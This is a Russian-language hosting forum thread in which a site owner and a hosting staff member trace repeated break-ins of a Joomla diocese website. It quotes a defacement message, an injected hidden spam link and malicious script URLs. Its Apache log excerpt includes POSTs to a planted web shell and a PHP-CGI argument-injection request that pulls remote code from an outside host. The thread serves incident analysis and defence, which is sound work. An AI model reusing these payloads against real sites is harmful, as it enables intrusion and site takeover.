• UAH
  • USD
  • RUB
  • EUR
  • +38(044) 392-74-33  Киев
  • +38(057) 728-39-00  Харьков
  • +38(056) 794-38-31  Днепр
  • +38(032) 229-58-93  Львов
  • +38(048) 738-57-70  Одесса
  • +38(093) 449-04-21  Life
  • +38(067) 400-88-44  Киевстар
  • +38(095) 630-90-82  MTC
  • +1(888)393-24-51  USA, Toll free
  • +44(131)507-01-14  Great Britain
  • +7(499) 348-28-61  Москва

Пожелания и предложения. Помощь с нахождением причины взлома в логах

Форумы Пожелания и предложения Помощь с нахождением причины взлома в логах
EparhiaNik
11.07.2013
хостинг: нет
домен: нет
Помощь с нахождением причины взлома в логах
Здравствуйте.
Сайт несколько раз ломали, информацию о всех случаях сохранял. Может ли кто-то из специалистов хостинга по этим данным и логам сервера определить пути взлома?
Илья
11.07.2013
хостинг: есть
домен: есть
Смотря какую информацию вы сохраняли и что подразумевается под ломали. Напишите подробную информацию, поможем чем сможем.
EparhiaNik
11.07.2013
хостинг: нет
домен: нет
Куда писать?
Илья
11.07.2013
хостинг: есть
домен: есть
На форуме можете писать, если там нет Ваших паролей. Другим тоже будет интересно как искать уязвимости.
EparhiaNik
11.07.2013
хостинг: нет
домен: нет
Ломали=получали доступ на сайт, записывали и изменяли файлы.

Файлы прилагаются в архиве. На архиве пароль - '1240', а то открытый архив антивирусы не пропускают. Кстати, раньше касперский в этих php вирусов не замечал, а теперь замечает. Пишет на них "Backdoor.PHP.PhpShell.dl" и удаляет с диска.

Случаи взлома сайта:
1) 11.08.2011
При входе на сайт отображалась страничка Hacked by Number 7 ~ Tunisian Hacke

Текст был такой:
---------------------------------------------------
Your Web Site Got Hacked By A tunisian Hacker called "Number 7"<br>
Hacked by Number 7<br>
You have No Security <br>
you must secure your web site<br>
for more security, contact : <br>
an.7@live.fr <br>
Greetz: # Tunisian Hackers<br>

Решение проблемы: Просто восстанавил сайт из бэкапа.

На наш сайт пару раз записывались вредоносные *.php, которые находил антивирус хостинга.

2) 11.12.2012

Записаны вредоносные *.php. Письмо от хостинга:
-------------------------------------------------
Вы получили это письмо как владелец хостинг-аккаунта eparhia. В результате проверки аккаунта антивирусом были обнаружены файлы, которые являются вредоносными или заражены.
Результаты поиска вредоносных файлов
Чаще всего наличие таких файлов свидетельствует о получении доступа к сайту злоумышленником с целью рассылки спама, осуществления атак на другие сайты и размещения фишинговых страниц. Список обнаруженных вредоносных файлов:
eparhia.mk.ua/2011-2012/images/stories/story.php
eparhia.mk.ua/www/images/stories/bobbi.php
----------------------------------------------------
Вредоносные файлы удалил, но после этого остались посторонние вставки в генерируемые html. (Заметил их только недавно, определил момент появления с помощью сервиса Вебархив
http://web.archive.org/web/201303...
посмотрел до взлома небыло, а после - появилось) :
------------------------------------------------------
<!-- 8c19761b95 --><div style="display:none"><a href="http://www.nwrpca.org/">... loans</a></div><!-- 8c19761b95 -->
-----------------------------------------------------

3) 29.05.2013
Антивирус хостинга прислал сообщение о вредоносных *.php. Найденные файлы удалил, сохранил сами файлы и дату их модификации.

Начиная с этого времени при просмотре сайта начал выводить собщения Антивирус Каперского:

I)
main Запрещено: HEUR:Trojan.Script.Generic 14.06.2013 13:55:49
http://blog2.therainbowcloud.com:6842/cb/main.ph...

II)
main.php?groupcp=174&sponsor=82&extra=237&deals=791&board=198&profile=133
Запрещено:
http://blog2.therainbowcloud.com:6842/commercial... (проверка по базе вредоносных веб-адресов) 14.06.2013 14:35:10
http://blog2.therainbowcloud.com:6842/commercial...

III)
main Обнаружено: HEUR:Trojan.Script.Generic 14.06.2013 15:48:18
http://blog2.kapsol.mobi:6842/cnet/main....

4) 06.06.13
Антивирус хостинга прислал сообщение о вредоносных *.php.
В корневом каталоге файлы: wp-conf.php, wthm6103g

Позже нашел в дирректории «/images»
файл 59e48.php
в корневом каталоге и во всех подкаталогах корневого такие файлы:

index_backup.php
.htaccess - со вставкой вначале подозрительного кода, либо просто с одним подозрительным кодом.
Дата создания файлов — 27.05.2013, антивирус хостинга их не нашел.
Решение: поудалял все подозрительные файлы.

Меры профилактики:
-Обновился до последней версии Джумлы 1.5.26
-Обновил все расширения, ненужные удалил
-Сменил логин админа, запретил доступ в /administrator со всех IP кроме своей подсети
-запретил запись в '/administrator' и 'configuration.php'
-изменил стандартные префиксы таблиц в БД
Прикрепленные файлы:
Илья
11.07.2013
хостинг: есть
домен: есть
За старые даты я не удастся посмотреть информацию, так как логов за столь длительный период времени - нет. 27 мая для заливки вирусов использовался существующий на тот момент файл wthm3925g.php Если бы знать когда создан был тот файл, то можно было бы найти как он попал на сервер и так идя по цепочке можно прийти к первоисточнику - запросу к Joomla или ее модулю, который был использован для заливки первого эксплоита. Лучше всего искать источник не удаляя вирусы. Кроме этого нужно сохранять не только дату, но и точное время с секундами.

Вот выдержка из лога Apache:
209.200.227.229 - - [27/May/2013:02:25:26 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 35372 "-" "Mozilla/5.0 (compatible; Konqueror/3.5; Linux 2.6.15-1.2054_FC5; X11; i686; en_US) KHTML/3.5.4 (like Gecko)"
192.232.224.208 - - [27/May/2013:02:25:28 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 8278 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
50.87.9.175 - - [27/May/2013:02:25:33 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 200 36193 "-" "Lynx/2.8 libwww-FM/2.1 SSL-MM/1.4 GNUTLS/0.8"
31.133.43.73 - - [27/May/2013:13:18:04 +0300] "POST /wthm3925g.php?cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1939 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
196.41.137.243 - - [27/May/2013:19:31:52 +0300] "POST /?-n+-dallow_url_include%3DOn+-dauto_prepend_file%3Dhttp://basemen.hk/success.tx... HTTP/1.0" 200 33962 "http://www.eparhia.mk.ua/?-n+-dallo... "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.452) Gecko/20041027 Mnenhy/0.6.0.104"
31.133.43.73 - - [27/May/2013:20:24:54 +0300] "POST /wthm3925g.php?t3420n=1&cookies=1&showimg=1&truecss=1&t2122n=1 HTTP/1.0" 200 1123 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET4.0C; .NET4.0E)"
95.134.122.147 - - [27/May/2013:20:50:20 +0300] "POST /photo/category/444-24032013-pravyashhij-arxierej-vozglavil-liturgiyu-i-chin-torzhestva-pravoslaviya.html HTTP/1.0" 200 7711 "http://eparhia.mk.ua/photo/cate... "Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.71 Safari/537.17 YE"
217.23.3.13 - - [27/May/2013:23:55:43 +0300] "POST /wthm3925g.php?t8904n=1 HTTP/1.0" 423 86 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3"
EparhiaNik
11.07.2013
хостинг: нет
домен: нет
/eparhia.mk.ua/www/wthm3925g.php модифицирован 27.05.2013 13:18:04
Думаю что это и есть дата создания
Участвовать в общении на этом форуме могут только
зарегистрированные пользователи.

Если вы уже зарегистрированы Вам необходимо войти на форум.

Тема закрыта по истечению срока давности.
Горячая линия
(044)
392 74 33
другие города